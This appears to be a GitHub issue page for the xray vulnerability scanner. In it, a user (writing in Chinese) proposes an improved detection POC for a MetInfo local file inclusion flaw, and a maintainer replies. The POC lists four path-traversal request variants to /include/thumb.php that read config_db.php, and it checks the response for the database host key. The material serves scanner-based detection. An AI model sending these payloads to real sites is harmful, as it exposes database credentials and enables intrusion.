xray icon indicating copy to clipboard operation
xray copied to clipboard

Published 20 hours ago verified publisher icon chaitin

metinfo-lfi-cnvd-2018-13393 的POC可完善

Open ghost opened this issue 4 years ago • 1 comments

地址为: https://github.com/chaitin/xray/blob/master/pocs/metinfo-lfi-cnvd-2018-13393.yml 完善后的poc关键部分为

groups:
  poc1:
    - method: GET
      path: /include/thumb.php?dir=..././http..././config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc2:
    - method: GET
      path: /include/thumb.php?dir=.....///http/.....///config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc3:
    - method: GET
      path: /include/thumb.php?dir=http/.....///.....///config/config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")
  poc4:
    - method: GET
      path: /include/thumb.php?dir=http\\..\\..\\config\\config_db.php
      expression:
        response.status == 200 && response.body.bcontains(b"con_db_host")

ghost avatar Feb 02 '21 06:02 ghost

感谢师傅的反馈,后续将对此poc进行规则增强处理

mashiro01 avatar Dec 22 '22 10:12 mashiro01